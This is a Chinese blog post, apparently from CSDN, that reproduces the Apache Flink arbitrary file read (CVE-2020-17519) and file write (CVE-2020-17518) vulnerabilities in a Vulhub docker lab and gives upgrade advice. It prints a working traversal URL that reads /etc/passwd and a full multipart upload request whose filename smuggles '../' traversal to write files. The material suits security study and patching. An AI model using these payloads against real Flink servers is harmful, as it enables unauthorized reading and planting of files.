Apache Flink任意文件写入(CVE-2020-17518)&任意文件读取(CVE-2020-17519)

最新推荐文章于 2024-02-23 14:54:58 发布
最新推荐文章于 2024-02-23 14:54:58 发布
阅读量351 收藏
点赞数
文章标签: docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43244584/article/details/113183915
版权

Apache Flink任意文件写入(CVE-2020-17518)&任意文件读取(CVE-2020-17519)

一、简介

​ Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

二、漏洞概述

​ Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。

三、影响版本

​ Flink 1.5.1-1.11.2

四、环境搭建

​ 使用vulhub进行安装

​ Vulhub地址:

​ https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

进入目录

cd vulhub-master/flink/CVE-2020-17518

cd vulhub-master/flink/CVE-2020-17517
安装环境

docker-compose up -d

五、漏洞复现

CVE-2020-17519

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519—————————————————————————————————————————————————————————————————
poc:http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

在这里插入图片描述

CVE-2020-17518

接着访问http://your-ip:8081

exp:

POST /jars/upload HTTP/1.1
Host: 192.168.0.131:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 183

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/test1"

test123
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

在这里插入图片描述

列出所有容器的id

docker ps   

在容器中执行命令

docker container exec -it 53dade1bf65c /bin/bash

六、修复建议

当前(2021/01/06)安全版本为

Apache Flink 1.12.0 & 1.11.3
建议相关用户升级Apache Flink到安全版本

下载地址:

https://flink.apache.org/downloads.html

参考文章:

https://blog.csdn.net/xuandao_ahfengren/article/details/112260262

https://mp.weixin.qq.com/s/FFp5bnjRBerErvU225P3Ig

Grace¥¥¥
关注
大数据Flink(四十七):扩展阅读 File Sink
Lansonli(蓝深李)的博客
05-17 2932
之前发布的 Flink 版本中[1],已经支持了 source connector 工作在流批两种模式下,因此在 Flink 1.12 中,社区着重实现了统一的 Data Sink API(FLIP-143)。Sink 的实现者只需要定义 what 和 how:SinkWriter,用于写数据,并输出需要 commit 的内容(例如,committables);Flink 1.12的 FileSink 为批处理和流式处理提供了一个统一的接收器,它将分区文件写入Flink文件系统抽象所支持的文件系统。
Apache Flink CVE-2020-17518-id:L.pdf
最新发布
04-30
### Apache Flink CVE-2020-17518 任意文件写入漏洞详解 #### 漏洞概述 CVE-2020-17518一个存在于 Apache Flink 中的安全漏洞,它允许远程攻击者通过 REST API 目录遍历来实现任意文件写入的功能。这一漏洞在 ...
flink从kafka读取数据写入clickhouse本地表的实现
weixin_44168526的博客
03-13 5897
实现功能 因为直接写clickhouse的分布式表在数据量比较大的时候会有各种问题,所以做了一个flink读取kafka数据然后路由写入到相应的本地表节点,并且关于不同的表的配置信息可以随时更改并设置生效时间。 实现流程 首先从kafka将数据读取过来 然后进行相应的处理及逻辑判断写入到对应的clickhouse表格中 最后根据CDC读取来的配置信息进行相应节点的hash路由,直接写入本地表 读取kafka数据 定义kafka工具类,实现kafka的source获取函数 public sta
CVE-2020-17518 flink任意文件上传漏洞复现
qq_49279082的博客
02-08 3047
本人对CVE-2020-17518漏洞的理解
Apache Flink -任意文件写入漏洞复现(CVE-2020-17518
0xSec
01-11 1504
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
Apache Flink -任意文件写入漏洞(CVE-2020-17518
chaojixiaojingang
01-07 4158
1.漏洞描述 Apache Flink一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
flamelu#Vulnerability-1#CVE-2020-17518 Apache Flink 任意文件写入1
07-25
CVE-2020-17518 Apache Flink 任意文件写入影响范围。
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
Apache Flink目录遍历(CVE-2020-17519)批量检测工具 2021年1月5日,Apache Flink官方发布安全更新,...Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件读取
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具 2021年1月5日,Apache Flink官方发布安全更新...Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件读取
Apache Flink (文件写入漏洞/文件读取漏洞​)CVE-2020-17518/17519
thelostworld
01-15 472
Apache Flink (文件写入漏洞/文件读取漏洞)CVE-2020-17518/17519一、漏洞描述Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。CVE-2020-17518: 文件写入漏洞攻击者利用REST API,可以修改H...
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现
ierciyuan的博客
08-04 885
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现。
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 1858
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
写入文件_【漏洞通告】CVE202017518 Apache Flink任意文件写入漏洞
weixin_35353904的博客
01-09 175
0x00漏洞概述产品名称CVE ID类 型漏洞等级远程利用Apache FlinkCVE-2020-17518任意文件写入高危是CVE-2020-17519任意文件读取高危是0x01漏洞详情Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式数据流引擎。2021年01月05日,Apache官方发布安全公告,公开了Apach...
Apache Flink 文件上传漏洞(CVE-2020-17518
weixin_53639243的博客
02-23 321
Apache Flink一个开源的流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。
CVE-2020-17518/17519Apache Flink 文件写入/读取漏洞
per_se_veran_ce的博客
01-07 455
CVE-2020-17518: 文件写入漏洞 攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的) 版本:Apache:Apache Flink: 1.5.1 - 1.11.2 CVE-2020-17519: 文件读取漏洞 Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的) 版本:Apa
漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)
七天
11-09 3505
文章目录一、Apache Flink简介二、漏洞简介三、漏洞复现四、上传jar包getshell 一、Apache Flink简介 Apache Flink一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。Apache Flink一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但
CVECVE-2020-17518 & CVE-2020-17519Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2665
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518CVE-2020-17519Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
写入文件_Apache Flink任意文件写入&任意文件读取复现
weixin_29502483的博客
01-12 231
01 漏洞简介Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行。Apache Flink 1.5.1引入了REST API,攻击者可通过构造恶意的HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值